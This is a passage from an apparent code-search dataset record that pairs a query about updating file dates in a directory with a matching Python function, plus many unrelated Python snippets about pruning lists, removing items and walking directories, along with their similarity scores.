files_to_ignore:\n logger.info(f\"{log_prompt} - Skipping gitignore file {file}\")\n self._facts[\"lint_files\"] = [\n path\n for path in self._facts[\"lint_files\"]\n if path not in files_to_ignore\n ]\n\n except (git.InvalidGitRepositoryError, git.NoSuchPathError):\n logger.debug(\"No gitignore files is available\")", "def removeModulesNotOnAPathExcluding( process, keepList=() ):\n allMods=set((x for x in process.producers_().iterkeys()))\n allMods.update((x for x in process.filters_().iterkeys()))\n allMods.update((x for x in process.analyzers_().iterkeys()))\n allMods.update((x for x in process.outputModules_().iterkeys()))\n \n modulesOnPaths = set()\n for p in process.paths_():\n modulesOnPaths.update( (x for x in getattr(process,p).moduleNames())) \n for p in process.endpaths_():\n modulesOnPaths.update( (x for x in getattr(process,p).moduleNames()))\n\n notOnPaths = allMods.difference(modulesOnPaths)\n \n keepModuleNames = set( (x.label_() for x in keepList) )\n \n getRidOf = notOnPaths.difference(keepModuleNames)\n \n for n in getRidOf:\n delattr(process,n)", "def clean(self):\n return _coconut_tail_call((self.__class__), *filter(_coconut.functools.partial(_coconut.operator.ne, self.identity), self.elems))", "def remove_features(sets_x, unused_features):\n\n # initiate empty list for return variable\n significant_x = [] \n\n # iterate through subsets and their corresponding insignificant features\n for x, features in zip(sets_x, unused_features):\n # remove features from subset and store the result into list\n significant_x.append(np.delete(x,features,1))\n \n return significant_x", "def Ignore(self, relative_file):\n return Whitelisted(relative_file)", "def reset(self):\n super().reset()\n self._includes = set(self.class_helper._includes)", "def remove_definitions_from(self, definitions):\n if isinstance(definitions, set):\n excluded_definitions = definitions\n else:\n excluded_definitions = set(definitions)\n assert all(x.library == self for x in excluded_definitions), \"Some definitions to remove are 
not included in \" \\\n \"the library \"\n included_definitions = list()\n for definition in self._definitions:\n if definition not in excluded_definitions:\n included_definitions.append(definition)\n else:\n self._remove_definition(definition)\n self._definitions = included_definitions", "def clean_duplicate(self):\r\n self.elements = list(set(self.elements))\r\n self.elements = [e for e in self.elements if e != '']", "def ignore_from_package(self, project, package, arch, ignore):\n for binary in binary_list(self.apiurl, project, 'standard', arch, package):\n ignore.add(binary.name)\n\n return ignore", "def ignores(self):\n return self._ignores", "def reset(self):\n super().reset()\n whitelist = []\n for parent in self.cls.mro():\n whitelist.extend(getattr(parent, 'tab_whitelist', []))\n\n if getattr(parent, \"tab_component_names\", False):\n for cpt_name in parent.component_names:\n if getattr(parent, cpt_name).kind != Kind.omitted:\n whitelist.append(cpt_name)\n\n self._includes = set(whitelist)", "def hole_cleanup(atom_list): \n joey = atom_list.copy()\n while (len(joey) != 0):\n for atom in joey:\n takein = [atom]\n source_update = takein.copy()\n check = 1\n while (check == 1):\n source = source_update.copy()\n source_update = []\n c = len(takein)\n for element in source:\n bonds = [bond[0] for bond in identify_bonds(element, joey) if bond[0] not in takein]\n for h in bonds:\n takein.append(h)\n source_update.append(h)\n if ((len(takein) == c) and (len(takein) < 6)):\n check = 0\n for element in takein:\n atom_list.remove(element)\n elif (len(takein) == c):\n check = 0\n for element in takein:\n joey.remove(element)\n return atom_list", "def _visit_ignore(self, elem):\n pass", "def _visit_ignore(self, elem):\n pass", "def removeDoublon(liste):\n tmp=[]\n for i,elt in enumerate(liste):\n if elt not in tmp:\n tmp.append(elt)\n return tmp", "def remove(self, *args):\n return _libsbml.ListOfReplacedElements_remove(self, *args)", "def ignores(self, value):\n value += self.__default_ignores\n tags, attributes = self._process_ignores(value)\n self.__ignores = list([tags, attributes])", "def remove():", "def remove(self, x):\n self._seen.remove(x)\n self._list.remove(x)", "def removeAll(self, c):\n for x in c:\n if x in self.knownStrings:\n self.knownStrings.remove(x)", "def ignore(self, regex: str) -> None:\n self._processed |= set(self.find(regex))", "def remove_paths(self, test):\n ii = 0\n while ii < len(self.paths):\n if test(self.paths[ii]):\n self.paths.pop(ii)\n else:\n ii += 1\n return self", "def ignore(self) -> list[str] | list[None]:\n if self._ignore is None:\n print(self.__class__.ignore.__doc__)\n raise SilSubProblemError(\n \"The *ignore* property has not been set (see above).\"\n )\n return self._ignore", "def FilterOutUnusedExpectations(self) -> Dict[str, List[BaseExpectation]]:\n logging.info('Filtering out unused expectations')\n unused = collections.defaultdict(list)\n unused_count = 0\n for (expectation_file, expectation,\n builder_map) in self.IterBuilderStepMaps():\n if not builder_map:\n unused[expectation_file].append(expectation)\n unused_count += 1\n for expectation_file, expectations in unused.items():\n for e in expectations:\n del self[expectation_file][e]\n logging.debug('Found %d unused expectations', unused_count)\n\n empty_files = []\n for expectation_file, expectation_map in self.items():\n if not expectation_map:\n empty_files.append(expectation_file)\n for empty in empty_files:\n del self[empty]\n logging.debug('Found %d empty files: %s', 
len(empty_files), empty_files)\n\n return unused", "def remove_values_from_list(self,list_,*values):\r\n for value in values:\r\n while value in list_:\r\n list_.remove(value)", "def delete_loops(self, in_path):\n res_path = list(in_path)\n for element in res_path:\n coincidences = self.get_coincidence_indices(res_path, element)\n #Reversa la lista para eliminar elementos de atras hacia adelante de la lista\n coincidences.reverse()\n for i, coincidence in enumerate(coincidences):\n if not i == len(coincidences)-1:\n res_path[coincidences[i+1]:coincidence] = []\n\n return res_path", "def retainAll(self, *args):\n pass", "def ancestor_remove_tags(self, tags):\n\n for ancestor in self.lineage():\n ancestor.remove_tags(tags)", "def stopword_removal(words):\n stops = set(stopwords.words('english'))\n words = [w for w in words if w not in stops]\n return words", "def without_duplicates(words):\n\n # the long way: add each item to a set through iteration\n #\n # duplicate_remover = set([])\n # for word in words:\n # duplicate_remover.add(word)\n # words = list(duplicate_remover)\n # return words\n\n # the quick version: convert to set removes duplicates, convert back\n words = set(words)\n return list(words)", "def remove(self, *args):\n return _libsbml.ListOf_remove(self, *args)", "def trim_adjacency_list(adj):\n old_list = adj.copy()\n for key in adj.keys():\n if links_to(old_list, key) == []:\n del(adj[key])\n return adj", "def prune(self, exclude: set[Path]) -> None:\n assert all(self.basedir in p.parents for p in exclude) # nosec\n\n after_relpaths = {p.relative_to(self.basedir) for p in exclude}\n to_delete = self.before_relpaths.difference(after_relpaths)\n\n for p in to_delete:\n path = self.basedir / p\n assert path.exists() # nosec\n\n if path.is_file():\n path.unlink()\n elif path.is_dir():\n try:\n path.rmdir()\n except OSError:\n # prevents deleting non-empty folders\n pass\n\n # second pass to delete empty folders\n # after deleting files, some folders might have been left empty\n for p in self.basedir.rglob(\"*\"):\n if p.is_dir() and p not in exclude and not any(p.glob(\"*\")):\n p.rmdir()", "def delete_lists():\n del SAVE_EXISTENT[:]\n del SAVE_PRICE[:]\n del CARDS[:]", "def without(self, *args):\n return self.reject(lambda x: x in args)", "def remove(self, *args):\n return _libsbml.ListOfSpeciesReferences_remove(self, *args)", "def remove_elements_from_set(s: set, *args) -> set:\n for _ in args:\n s.remove(_)\n return s", "def prune(self): # HashMap.prune\n for hashval, list in self.contentHash.iteritems():\n newlist=[]\n for entry in list:\n if not entry.deleted:\n newlist.append(entry)\n self.contentHash[hashval]=newlist", "def remove_duplicate_notes(self):\n res = []\n for x in self.notes:\n if x not in res:\n res.append(x)\n self.notes = res\n return res", "def clear_invalid_node_references(doc, ids_to_remove):\n start = time.time()\n for elem in doc.iter(\"nd\"):\n ref = elem.attrib[\"ref\"]\n\n if ref in ids_to_remove:\n tmp = elem\n elem = elem.getnext()\n tmp.getparent().remove(tmp)\n\n print 'Time Taken :: ', round(time.time() - start, 3), \" seconds\"\n return doc", "def _RemoveFromCloneList(self, clone, attrNamesToClone):\n attrNamesToClone = super(EquationUnit, self)._RemoveFromCloneList(clone, attrNamesToClone)\n \n dontClone = [\"_Funcs\", \"_FuncsDefs\"]\n \n for name in dontClone:\n if name in attrNamesToClone:\n attrNamesToClone.remove(name)\n \n return attrNamesToClone", "def cleanup():\n for s in [missiles, explosions, bonus]:\n\n set_to_remove = set([])\n for 
m in s:\n if m.isDead:\n set_to_remove.add(m)\n\n s.difference_update(set_to_remove)", "def twogremove(tr_twoglijst, tr_twogs):\n for b in tr_twoglijst:\n tr_twogs.remove(b)", "def remove(self, identifier: int):\n self.items = list(filter(lambda x: x.identifier != identifier, self.items))", "def trim_items(self, items):\r\n\t\tlogger.debug(\"Enter\")\r\n\t\t\r\n\t\tif self.transactions:\r\n\t\t\tall_items = set.union(*[self.transactions[u][-1] for u in self.transactions.keys()])\r\n\t\telse:\r\n\t\t\treturn items\r\n\t\t\t\r\n\t\ttmp = items.copy()\r\n\t\t\r\n\t\tfor i in items:\r\n\t\t\tif i in all_items:\r\n\t\t\t\tlogger.debug(\"Removing %r\" % i)\r\n\t\t\t\ttmp.remove(i)\r\n\t\t\t\t\r\n\t\tlogger.debug(\"Exit\")\r\n\t\treturn tmp", "def _remove_ignored_empty_subelems(subelems1, subelems2, parent_path, ignore_namespaces, ignored_empty_tags, debug_stream):\r\n ds = debug_stream\r\n if ds: print >>ds, \"parent_path: %s\" % parent_path\r\n removed = []\r\n for i, subelem1 in enumerate(subelems1):\r\n if len(subelem1.getchildren()) > 0:\r\n continue\r\n \r\n # See if the tag should be ignored if it doesn't exist on\r\n # the other side\r\n is_ignored = False\r\n for ignored_tag in ignored_empty_tags:\r\n if ds: print >>ds, \"ignored_tag = %s, tag = %s\" % (ignored_tag, parent_path + \"/\" + _get_tag(subelem1, ignore_namespaces))\r\n if ignored_tag == parent_path + \"/\" + _get_tag(subelem1, ignore_namespaces):\r\n is_ignored = True\r\n break\r\n if not is_ignored:\r\n continue\r\n \r\n # See if the tag exists on the other side\r\n found = False\r\n for subelem2 in subelems2:\r\n if _get_tag(subelem1, ignore_namespaces) == _get_tag(subelem2, ignore_namespaces):\r\n found = True\r\n break\r\n if not found:\r\n removed.append(i)\r\n \r\n # Sort and reverse the removed list so that deleting starts from the\r\n # end and the indices are correct throughout the operation\r\n removed.sort()\r\n removed = removed[::-1]\r\n if len(removed) >= 2:\r\n if removed[0] < removed[-1]:\r\n raise RuntimeError(\"Internal error: list in wrong order: %s\" % removed)\r\n \r\n for i in removed:\r\n del subelems1[i]", "def list_subtract(a, b):\n a_only = list(a)\n for x in b:\n if x in a_only:\n a_only.remove(x)\n return a_only", "def _unprune_referenced_sub_workflows(self, keep_paths, prune_paths):\n\n keep_nodes = frozenset([path[-1] for path in keep_paths])\n\n shift_path_indexes = frozenset(\n idx for (idx, path) in enumerate(prune_paths)\n if any(node in keep_nodes for node in path))\n\n if not shift_path_indexes:\n return (keep_paths, prune_paths)\n\n for idx in shift_path_indexes:\n node = prune_paths[idx][-1]\n logger.info(\n \"Keeping node %s.%s because it is downstream of an --only-nodes argument\",\n node[0],\n node[1])\n\n return self._unprune_referenced_sub_workflows(\n keep_paths + [prune_paths[i] for i in shift_path_indexes],\n [path for (i, path) in enumerate(prune_paths) if i not in shift_path_indexes])", "def prune_taxa(self, taxa, update_taxon_set=False):\n for taxon in taxa:\n if taxon in self.taxon_seq_map:\n del self.taxon_seq_map[taxon]\n if update_taxon_set and taxon in self.taxon_set:\n self.taxon_set.remove(taxon)", "def removeFromPlayerList(self):\n\t\tfor x in self.playerRemoveList:\n\t\t\tself.removePlayer(x)", "def removebannedtracks(bannedtracks, similartracks, logger): # {{{1\n nbannedtracks = 0\n index = 0\n while index < len(similartracks):\n weight, track = similartracks[index]\n if track.get('artist', '') != '' and track.get('title', '') != '' and \\\n createkey(track['artist'], 
track['title']) in bannedtracks:\n del similartracks[index]\n nbannedtracks += 1\n else:\n index += 1\n if nbannedtracks > 0:\n logger.debug('Ignored %i banned track(s) from Last.fm', nbannedtracks)", "def discard(self, value):\n if value not in self._innercontainer:\n warnings.warn(\"Element %s to discard is not in the collection, skip.\" % (value.__str__()),\n category=InexistentElementWarning,\n stacklevel=3)\n else:\n self._innercontainer.remove(value)\n return self", "def remExternalDependency(self, mods):\n for mod in mods:\n try:\n self.reqmodules_external.remove(mod)\n except:\n print \"\\n*** WARNING: \" + mod + \" not found in the list of external dependencies from \" + self.name + \"!!\"\n print \"please recheck your config file: names are case-sensitive!!\"", "def _filter_denies(self, filtered_ref):\n for deny in self.denies_:\n if not deny:\n continue\n\n for ref_key in filtered_ref.ref_keys(deny):\n del filtered_ref[ref_key]", "def removeAdopted(credInstances, orphanedInstances):\n # Make sure we have a copy of the keys not just an iterator\n # since we'll be deleting\n for k in list(credInstances.keys()):\n if k not in orphanedInstances:\n credInstances.pop(k)", "def retainAll(self, c):\n for x in self.knownStrings:\n if x not in c:\n self.knownStrings.remove(x)", "def remove(self):\n self.inp.inputs.discard(self)\n self.out.outputs.discard(self)", "def prune(self, arguments):\n puts_err(colored.red(\"Not implemented!\"))", "def prune(self, rel=None):\n deleted = self._registry._get_not_reachable(self.root, rel=rel)\n for d in deleted:\n self._delete_cuds_triples(d)", "def drop_reference_points(self):\n self._cpp_obj.drop_reference_points()\n return self", "def excludes(self) -> Set:\n if self._excludes is None:\n manifest = self._get_manifest()\n self._excludes = manifest[\"files\"][\"excludes\"]\n\n return self._excludes", "def exclude_nodes(self, nodes):", "def removeDuplicates(self,covariateList,bands):\n\t\t\n\t\treturn [elem for elem in covariateList if elem not in bands]", "def list_remove(alist, items):\n for item in get_iter(items):\n while item in alist:\n alist.remove(item)", "def _prune_heads(self, heads_to_prune):\n for layer, heads in heads_to_prune.items():\n self.encoder.layer[layer].attention.prune_heads(heads)", "def _prune_heads(self, heads_to_prune):\n for layer, heads in heads_to_prune.items():\n self.encoder.layer[layer].attention.prune_heads(heads)", "def _prune_heads(self, heads_to_prune):\n for layer, heads in heads_to_prune.items():\n self.encoder.layer[layer].attention.prune_heads(heads)", "def filter_backups_to_keep(self, backups: List[Backup]) -> (List[Backup]):\n pass", "def remove_tags(self, tags):\n\n tags = H.to_list(tags)\n # self._tags.difference_update(tags)\n self.tags.difference_update(tags)", "def remove_identical(list):\n seen = set()\n seen_add = seen.add\n return [x for x in list if not (x in seen or seen_add(x))]", "def ignore_unmanaged_references(unmanaged_virtuals, unmanaged_pools,\n delete_policies, delete_irules,\n delete_pools, delete_monitors,\n delete_data_groups):\n\n ignore_policies = set()\n ignore_irules = set()\n ignore_pools = set()\n ignore_monitors = set()\n ignore_data_groups = set()\n\n # Start off getting a list of referenced resources\n for virtual in unmanaged_virtuals:\n for rule in virtual.data['rules']:\n ignore_irules.add(rule)\n for policy in virtual.data['policies']:\n ignore_policies.add(\"/{}/{}\".format(policy['partition'],\n policy['name']))\n\n for policy in delete_policies:\n if policy.full_path() in 
ignore_policies:\n for rule in policy.data['rules']:\n if 'actions' in rule:\n for action in rule['actions']:\n if 'pool' in action:\n # pool name contains partition already\n ignore_pools.add(action['pool'])\n\n # For irules we examine the irule content for a reference to\n # any of the data groups we want to delete (not ideal). If we\n # find a mention of the data group, we don't delete it.\n for irule in delete_irules:\n if irule.full_path() in ignore_irules:\n for data_group in delete_data_groups:\n if data_group.name in irule.data['apiAnonymous']:\n ignore_data_groups.add(data_group.full_path())\n\n # For the pools we are not going to delete (either unmanaged, or\n # referenced by an unmanaged virtual server), we must not delete\n # the referenced health monitor.\n for pool in unmanaged_pools:\n ignore_monitors.update(pool.monitors())\n for pool in delete_pools:\n if pool.full_path() in ignore_pools:\n ignore_monitors.update(pool.monitors())\n\n # Remove from the delete list any resource still used by the\n # whitelisted virtuals\n def _prune_resources(resource_name, resource_list, ignore_resources):\n found = True\n while found:\n found = False\n for idx, resource in enumerate(resource_list):\n if resource.full_path() in ignore_resources:\n LOGGER.debug(\"Pruning %s resource %s from delete list\",\n resource_name, resource.full_path())\n del resource_list[idx]\n found = True\n break\n\n _prune_resources(\"policy\", delete_policies, ignore_policies)\n _prune_resources(\"irule\", delete_irules, ignore_irules)\n _prune_resources(\"pool\", delete_pools, ignore_pools)\n _prune_resources(\"monitor\", delete_monitors, ignore_monitors)\n _prune_resources(\"data_group\", delete_data_groups, ignore_data_groups)", "def remove_unused_influence(skin_node):\n influence_list = skin_node.getInfluence()\n weight_inf_list = skin_node.getWeightedInfluence()\n # Set skinCluster to HasNoEffect so it won't process after each removal\n skin_node.nodeState.set(1)\n zero_weight_inf_list = list(set(influence_list) - set(weight_inf_list))\n skin_node.removeInfluence(zero_weight_inf_list)\n skin_node.nodeState.set(0)\n return zero_weight_inf_list", "def mRemove(self, **kw):\n kw = copy_non_reserved_keywords(kw)\n for key, val in kw.items():\n # It would be easier on the eyes to write this using\n # \"continue\" statements whenever we finish processing an item,\n # but Python 1.5.2 apparently doesn't let you use \"continue\"\n # within try:-except: blocks, so we have to nest our code.\n try:\n orig = self._dict[key]\n except KeyError:\n # No existing variable in the environment, so just skip it\n pass\n else:\n try:\n # Most straightforward: just try to substract it.\n # But this will not work in most cases :-(\n self._dict[key] = orig - val\n except TypeError:\n try:\n # It orig and val is dictionaties:\n for k in val.keys():\n del orig[k]\n # May be some recursion ?\n except AttributeError:\n try:\n # Check if the original is a list.\n remove_from_orig = orig.remove\n except AttributeError:\n # Can't do nothing more\n pass\n else:\n # The original is a list, so remove\n # value from it.\n try:\n i = val[0]\n except TypeError:\n val = [ val ]\n for i in val:\n try:\n remove_from_orig(i)\n except ValueError:\n pass\n self.scanner_map_delete(kw)" ]
[ "0.6355515", "0.63518995", "0.62366766", "0.6146372", "0.609999", "0.60373515", "0.59647715", "0.58614707", "0.58380705", "0.581101", "0.57721406", "0.5733889", "0.56982344", "0.5688912", "0.56855273", "0.5677034", "0.5676934", "0.5671325", "0.5661625", "0.56558764", "0.5645472", "0.563794", "0.55878043", "0.55845237", "0.5576259", "0.5575393", "0.55559015", "0.5551329", "0.55386376", "0.551091", "0.5498882", "0.5498519", "0.54809004", "0.54794014", "0.54777473", "0.5435313", "0.5433683", "0.54273856", "0.54133874", "0.54080844", "0.54065543", "0.54065543", "0.54026496", "0.5400365", "0.53931093", "0.5389099", "0.5389074", "0.53845024", "0.53827506", "0.5379948", "0.53686076", "0.5363458", "0.53553003", "0.5349619", "0.5342054", "0.5338471", "0.53352743", "0.5334963", "0.5332074", "0.53275275", "0.53217214", "0.5321436", "0.5316534", "0.5314192", "0.5313343", "0.53044325", "0.5303761", "0.52967364", "0.52931815", "0.52929044", "0.5288462", "0.52861387", "0.5285163", "0.5284783", "0.5284395", "0.5276463", "0.52737325", "0.5273154", "0.5269539", "0.52626765", "0.52626497", "0.5262173", "0.52606004", "0.5254817", "0.52541983", "0.525318", "0.5252919", "0.5250377", "0.5246868", "0.52439386", "0.5238101", "0.52365446", "0.52349305", "0.52349305", "0.52349305", "0.523083", "0.52292407", "0.52282345", "0.5223091", "0.5214466", "0.52109313" ]
0.0
-1
This function loops through directory and updates dates of files in said directory.
def update_date(dest=dest):
    for root, _, files in os.walk(dest):
        ignore = ["README.md","SUMMARY.md"]
        _ = [edit_files(root + "/" + file) for file in files if (file not in ignore and file.endswith(".md"))]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _update_files():\n configuration_settings = get_configuration()\n\n # Need to find all of the files that are stored in the input_files directories in order to start building the\n # reports that will be used to generate the static log files.\n for input_path in configuration_settings.processing.inputs:\n search_path = pathlib.Path(input_path)\n\n # Currently going to make the assumption that everyone is using the path naming convention that I'm dictating\n # which is YYYY/MM/DD/file.ext\n for file_component in search_path.glob('*/*/*/*'):\n # Store all of the files into a dictionary containing the keys and a list of the files that are associated\n # with that day\n updaters.update_files(search_path, file_component)", "def upload_all_workout_from_directory(directory_path):\n day = datetime.date.today() - datetime.timedelta(days=datetime.date.today().weekday(), weeks=1)\n for root, dirs, files in os.walk(directory_path):\n for f in files:\n print(f)\n upload_workout_from_directory(os.path.relpath(os.path.join(root, f), \".\"), get_next_monday(day))\n day = get_next_monday(day)", "def run(self):\n super().run()\n date_subdirs = sorted(self.list_directory(self.input_location,\n self.input_location_type))\n for date_subdir in date_subdirs:\n if not re.search(\"^([\\d]{4}-[\\d]{2}-[\\d]{2})\", date_subdir):\n print(\"{}: Directory name {} not in YYYY-MM-DD format\"\\\n .format(self.name, date_subdir))\n continue\n date_path = os.path.join(self.input_location, date_subdir, \"RAW\")\n if len(self.list_directory(date_path, self.input_location_type)) == 0:\n continue\n processed_ok = self.process_single_date(date_path)\n if not processed_ok:\n continue", "def iterate_dir(dir_path:str, files, equipt_nr):\n for ii in os.listdir(dir_path):\n if os.path.isdir(ii):\n iterate_dir(ii)\n elif re.search('[0-9]{7}', ii):\n rename_file(ii, equipt_nr)\n else:\n print('not editing : ' + ii)", "def update(self):\n if os.path.isdir(self.full_path):\n self.file_list = os.listdir(self.full_path)\n else:\n self.file_list = []", "def getFilesToProcess(directoryPath, nextDateToProcess) :\n fileNames = []\n for (dirpath, dirnames, filenames) in os.walk(directoryPath) :\n fileNames.extend(filenames)\n break\n\n nextDate = datetime.datetime.strptime(nextDateToProcess, \"%Y-%m-%d\")\n filesToProcess = []\n for fileName in fileNames :\n tokens = fileName.split('_')\n lastToken = tokens[len(tokens) - 1]\n tokens = lastToken.split('.')\n dateTimeString = tokens[0]\n dateTimeObj = datetime.datetime.strptime(dateTimeString, \"%Y-%m-%d-%H-%M\")\n if dateTimeObj.date() == nextDate.date() :\n filesToProcess.append(fileName)\n\n return filesToProcess", "def main():\r\n parent_dir = 'D:\\\\Profession\\\\Intern\\\\Assignments\\\\Codes\\\\Assignement Codes\\\\Part 2\\\\data_dumps'\r\n\r\n if not (os.path.isdir(parent_dir)):\r\n raise Exception(\"The directory doesn't exist\")\r\n\r\n directories = []\r\n\r\n for directory in os.listdir(parent_dir):\r\n directories.append(os.path.join(parent_dir, directory))\r\n\r\n # The group_dic represents the dictionary with keys equal to the unique dates in the directories\r\n # And the values represent a list of all files that have the same date prefix across the data_dumps\r\n group_dic = grouping(directories)\r\n\r\n # Moving Files into New Directory\r\n move(group_dic, parent_dir)\r\n print(\"Files Moved Successfully\")", "def count_files_loop(self, dirpath):\n for i in os.listdir(dirpath):\n if i[0] == '.':\n continue\n elif os.path.isdir(dirpath + i):\n self.count_files_loop(dirpath + 
i + '/')\n elif os.path.isfile(dirpath + i):\n self.file_count += 1\n else:\n print dirpath + i, 'does not exist'\n return", "def update_source_files(source_directory_list, source_extension_list):\n # get source files in the directory list\n source_total = 0\n for unused, source_directory in enumerate(source_directory_list):\n source_files_list = []\n get_requested_files(source_directory, source_extension_list, source_files_list)\n # update the files with shared object references\n for unused, source_file in enumerate(source_files_list):\n updated_file = []\n file_changed = modify_input_file(source_file, updated_file)\n if file_changed:\n filepath = get_printble_filepath(source_file)\n print(filepath)\n source_total += 1\n if __file_update:\n write_output_file(updated_file, source_file)\n print(\"Total Files\", source_total)\n print()", "def parse_dir(self, directory):\n for dir in os.listdir(directory):\n if dir in ['.git', '.github', '.vscode', 'docs']:\n continue\n next_dir = os.path.join(directory, dir)\n if os.path.isdir(next_dir):\n if dir.startswith('template_'):\n self.parse_template(next_dir)\n else:\n normpath = os.path.relpath(next_dir)\n normpath = os.path.normpath(normpath)\n path = normpath.split(os.sep)\n self.add_folder(path)\n # add_directory(next_dir)\n self.parse_dir(next_dir)", "def process_dir(self, src_dir, dst_dir):\n self.logger.tree(src_dir)\n for srcpath in self.list_all_files(src_dir):\n dstpath = srcpath.replace(src_dir, dst_dir)\n # TODO: Can we clean up the way we handle relative_path?\n # Relative path is here so that when we print files in the log it\n # shows only the file's path. Should we just pass it to the logger\n # when we create it? Or let the logger figure it out?\n # relative_path = srcpath.replace(src_dir + '/', '')\n self.cur_file = File(srcpath, dstpath, self.logger)\n self.process_file(self.cur_file)", "def dolibupdate(root, subdir):\n\n global fileCount, grooveCount, gdDate, grooveDB, processedFiles, mkGrooveList\n\n db = grooveDB[0][1]\n\n if subdir == '.':\n print \"Skipping: '.'\"\n return\n\n if subdir:\n print \" Processing library directory '%s'.\" % subdir\n\n\n \"\"\" Get a list of the files in this directory. If the list\n includes a file called 'MMAIGNORE' the entire directory\n (and subdirs) is ignored. 
Otherwise, each file in the\n directory ending in 'mma' is parsed for groove defs.\n \"\"\"\n\n p = os.path.join(root,subdir)\n dirfiles = os.listdir(p)\n\n if \"MMAIGNORE\" in dirfiles:\n print \"Skipping: %s\" % p\n return\n\n for fn in sorted(dirfiles):\n\n # Ignore hidden files and emacs auto-save and dead.\n\n if fn.startswith('.') or fn.startswith('#'):\n continue\n\n f=os.path.join(root, subdir, fn) # Create full path name\n\n if os.path.isdir(f):\n dolibupdate(root, os.path.join(subdir,fn)) # recursive!\n\n elif f.endswith(gbl.ext):\n ename = os.path.join(subdir, fn)\n\n processedFiles.append(ename)\n \n if gdDate and ename in db and os.path.getmtime(f) < gdDate:\n print \" Existing: %s\" % f\n grooveCount += len(db[ename])\n continue\n\n if ename in db:\n print \" Updating: %s\" % f\n else:\n print \" Creating: %s\" % f\n mkGrooveList = []\n MMA.grooves.grooveClear([])\n gbl.mtrks = {}\n MMA.swing.mode = 0\n for c in gbl.midiAssigns.keys():\n gbl.midiAssigns[c]=[]\n for a,v in enumerate(gbl.midiAvail):\n gbl.midiAvail[a]=0\n gbl.mtrks[0]=MMA.midi.Mtrk(0)\n\n gbl.tnames = {}\n\n MMA.parse.parseFile(f) # read current file, grab grooves\n\n fileCount += 1 # just so we can report to user\n grooveCount += len(mkGrooveList)\n db[ename]=mkGrooveList\n\n else:\n if not f.endswith(mmadir):\n print \" Ignoring: %s\" % f", "def add_timestamps(dir_video):\n print(\"Adding creation dates to file names\")\n os.chdir(dir_video)\n # get only top level dir info\n dir_data_video_files = next(os.walk(dir_video))\n list_video_files = dir_data_video_files[2] # get file list\n for f_name in list_video_files:\n if GOPRO_PATTERN.search(f_name):\n f_time = time.strftime(r\"%Y-%m-%d_%H-%M\", time.localtime(os.path.getctime(f_name)))\n os.rename(f_name, f\"{f_time}_{f_name}\")", "def updateIndex(self):\n for root, dirs, files in os.walk(self.serverdir):\n for d in dirs:\n if not d.startswith('.'):\n relpath = os.path.relpath(os.path.join(root, d), self.serverdir)\n self.serverindex[relpath] = (self.getNametype(os.path.join(root,d)), os.path.getmtime(os.path.join(root, d)))\n for f in files:\n if not f.startswith('.'):\n relpath = os.path.relpath(os.path.join(root, f), self.serverdir)\n self.serverindex[relpath] = (self.getNametype(os.path.join(root,f)), os.path.getmtime(os.path.join(root, f)))", "def updateCache(self):\n for root, dirs, files in os.walk(cachedFilesPath):\n for file in files:\n if file.endswith(cachedFileExtensionSuffix):\n path = os.getcwd()+'/'+cachedFilesPath+file\n with open(path, mode='r') as f:\n payload_json = f.read()\n payload_obj=jsonpickle.decode(payload_json)\n r= self.upload(payload_obj)\n if isinstance(r, types.NoneType):\n #do nothing\n print(\"\")\n else:\n if r.status_code == 200 :\n #uploaded!\n if cacheArhive:\n #move it to archive\n dst=os.getcwd()+'/'+cachedArchivePath+file\n shutil.move(path, dst)\n print(\"archived log: \", file)\n else:\n #delete it\n os.remove(path)", "def do_merge_all():\n for rawd, merged in TOMERGE:\n mylogger.info(\"cleaning \" + merged)\n ensure_dir(merged)\n cleandir(merged)\n mylogger.info(\"merging \" + rawd + \" to \" + merged)\n build_merged_dir(build_sensor_file_map(rawd), merged)\n\n # add timestamp file\n\tf = open(TIMESTAMP_FILE,\"w\")\n\tf.write(str(datetime.datetime.now()))\n\tf.close()", "def scan_dir(self, dir):\n import pathlib\n import magic\n\n for filename in find_all_files(dir):\n self.filelist.append({\n \"filename\": filename,\n \"mime\": magic.from_file(filename, mime=True),\n \"size_bytes\": os.path.getsize(filename),\n 
\"ext\": pathlib.Path(filename).suffix\n })", "def update_reports():\n return os.listdir('./reports')", "def _update_subfiles(self) -> None:\n\t\t# Clear list of subfiles\n\t\tself.subfiles.clear()\n\t\t# Iterate over Nodes\n\t\tfor node in self.nodes:\n\t\t\tfor file in node.get_subfiles():\n\t\t\t\tself.subfiles.add(\"{}/{}\".format(self.xml_dir, file))\n\t\t# Iterate over SubNodes\n\t\tfor subnode in self.subnodes:\n\t\t\tfor file in subnode.filenames:\n\t\t\t\tself.subfiles.add(\"{}/{}\".format(self.xml_dir, file))", "def calibrate_directory(self, directory, custom_file, out_dir, overwrite_rad, overwrite_ref):\n self.total_files = sum([len(files) for r, d, files in os.walk(directory)])\n self.current_file = 1\n try:\n for file_name in os.listdir(directory):\n # check each file in directory (file or subdirectory?)\n full_path = os.path.join(directory, file_name)\n if os.path.isdir(full_path) and full_path is not out_dir:\n # recursive call for each subdirectory\n self.calibrate_directory(os.path.join(directory, file_name), custom_file, out_dir,\n overwrite_rad, overwrite_ref)\n else:\n # calibrate each file individually\n self.calibrate_file(full_path, custom_file, out_dir, overwrite_rad, overwrite_ref)\n self.current_file += 1\n self.update_progress()\n except FileNotFoundError:\n print(directory + \": directory does not exist.\")\n with open(self.logfile, 'a+') as log:\n log.write(directory + ': relative reflectance input - directory does not exist \\n')\n if self.main_app is not None:\n raise InputFileNotFoundException(directory)\n self.update_progress(100)", "def save(self,\n directory,\n dir_pattern=None,\n file_pattern=\"{accession_number}\",\n download_all=False,\n daily_date_format=\"%Y%m%d\"):\n for (year, quarter, f) in self.quarterly_date_list:\n self.quarterly.year = year\n self.quarterly.quarter = quarter\n self.quarterly.entry_filter = lambda x: f(x) and self.entry_filter(x)\n self.quarterly.save(directory=directory,\n dir_pattern=dir_pattern,\n file_pattern=file_pattern,\n download_all=download_all)\n\n for d in self.daily_date_list:\n self.daily.date = d\n try:\n self.daily.save(directory=directory,\n dir_pattern=dir_pattern,\n file_pattern=file_pattern,\n download_all=download_all,\n date_format=daily_date_format)\n except (EDGARQueryError, NoFilingsError):\n pass", "def recursively_rename_files():\n ordered_equipts = get_directory_definition()\n\n # Iterates each equipement folder\n for ii in ordered_equipts:\n iterate_dir(ii, ordered_equipts.index(ii))", "def update_directory(dir):\n print('Updating {dir}...'.format(dir=dir))\n os.chdir(dir)\n status = 1\n tries = 0\n # Keep trying to git pull until success, or until tries = 30\n while status != 0:\n status = os.system('sudo git pull')\n tries += 